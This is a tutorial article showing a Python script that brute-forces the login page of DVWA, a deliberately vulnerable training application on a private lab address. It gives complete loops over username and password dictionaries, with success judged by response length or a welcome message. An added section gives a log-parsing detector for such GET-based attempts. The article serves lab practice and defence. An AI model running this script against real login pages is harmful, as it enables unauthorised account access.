Python Script for Brute‑Force Login on DVWA Using HTTP GET Requests
This article demonstrates how to use a Python script to perform a brute‑force attack against the DVWA login page by sending HTTP GET requests with custom headers and payloads, iterating over username and password dictionaries, recording response status, content length, and saving results to CSV or TXT files.
The tutorial explains how to target the DVWA (Damn Vulnerable Web Application) brute‑force module at low and medium security levels using a Python script that sends GET requests to the login URL.
Key code explanations include setting the target URL, defining request headers, and constructing the payload dictionary with username, password, and a Login field.
Example URL assignment:

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"

Headers are defined as:

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie': 'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}

The payload is built like:

payload = {'username': username, 'password': password, "Login": 'Login'}

A GET request is sent and the response is stored in Response:

Response = requests.get(url, params=payload, headers=header)

The script then records the HTTP status code and the length of the response content, concatenates these values with the username and password, and writes each line to a CSV file:

result = str(Response.status_code) + ',' + username + ',' + password + ',' + str(len(Response.content))
f.write(result + '\n')

Method One writes the collected data (status code, username, password, packet length) to result.csv and uses the difference in packet length to infer successful logins.
import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
header = {...}  # the User-Agent and Cookie dictionary shown above
f = open('result.csv', 'w')
# CSV header: status code, username, password, packet length
f.write('状态码,用户名,密码,包长度\n')
# outer loop over the username dictionary, inner loop over the password dictionary
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username': username, 'password': password, "Login": 'Login'}
        Response = requests.get(url, params=payload, headers=header)
        # one CSV row: status code, username, password, response length
        result = str(Response.status_code) + ',' + username + ',' + password + ',' + str(len(Response.content))
        f.write(result + '\n')
f.close()
print('\n完成')

Method Two checks the response text for the phrase "Welcome to the password protected area" to determine a successful login and writes the valid credentials to result.txt.
# Method Two: same loops as Method One, with f = open('result.txt', 'w');
# only the body of the inner loop after the request changes
        if Response.text.find('Welcome to the password protected area') != -1:
            result = username + ':' + password
            print(result)
            f.write(result + '\n')
print('\n完成')

The article includes screenshots of the script output, the captured HTTP packets, and the final results, illustrating how differing packet lengths correspond to successful versus failed login attempts.
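Because the DVWA login is submitted with GET, every attempt leaves the username and password in the web server's access log, which makes the attack pattern above easy to spot from the defender's side. The following is an added example, not code from the article: it parses constructed Apache combined-format log lines and flags any source IP that tries several distinct passwords for one username within a short window. The log lines, IPs and timestamps are invented for the example; the path comes from the article's target URL.

```python
# Added detection example (not from the original article): find GET-based login
# brute forcing in access logs by counting distinct passwords per (ip, username).
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed Apache "combined" log lines; IPs, timestamps and credentials are invented.
SAMPLE_LOG = """\
192.168.171.50 - - [10/Oct/2023:13:55:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4471 "-" "Mozilla/5.0"
192.168.171.50 - - [10/Oct/2023:13:55:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=letmein&Login=Login HTTP/1.1" 200 4471 "-" "Mozilla/5.0"
192.168.171.50 - - [10/Oct/2023:13:55:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=qwerty&Login=Login HTTP/1.1" 200 4471 "-" "Mozilla/5.0"
192.168.171.50 - - [10/Oct/2023:13:55:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4532 "-" "Mozilla/5.0"
192.168.171.77 - - [10/Oct/2023:13:56:10 +0000] "GET /dvwa/vulnerabilities/brute/?username=gordonb&password=abc123&Login=Login HTTP/1.1" 200 4532 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*" (\d{3}) (\d+)')
LOGIN_PATH = "/dvwa/vulnerabilities/brute/"  # path from the article's target URL

def parse_line(line):
    """Return a dict for a GET to the login page, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, target, _status, size = m.groups()
    parsed = urlparse(target)
    if parsed.path != LOGIN_PATH:
        return None
    qs = parse_qs(parsed.query)  # GET logins leave username/password in the query string
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "username": qs.get("username", [""])[0],
            "password": qs.get("password", [""])[0], "size": int(size)}

def find_bruteforce(log_text, threshold=3, window=timedelta(minutes=1)):
    """Map (ip, username) -> number of distinct passwords tried, for sources that
    tried at least `threshold` different passwords for one username within `window`."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            attempts[(rec["ip"], rec["username"])].append((rec["time"], rec["password"]))
    flagged = {}
    for key, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # slide a window from each attempt
            distinct = {pw for t, pw in events[i:] if t - start <= window}
            if len(distinct) >= threshold:
                flagged[key] = len(distinct)
                break
    return flagged
```

On the sample log, find_bruteforce(SAMPLE_LOG) flags only 192.168.171.50 against admin; the single gordonb attempt from another address stays below the threshold.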
Python Programming Learning Circle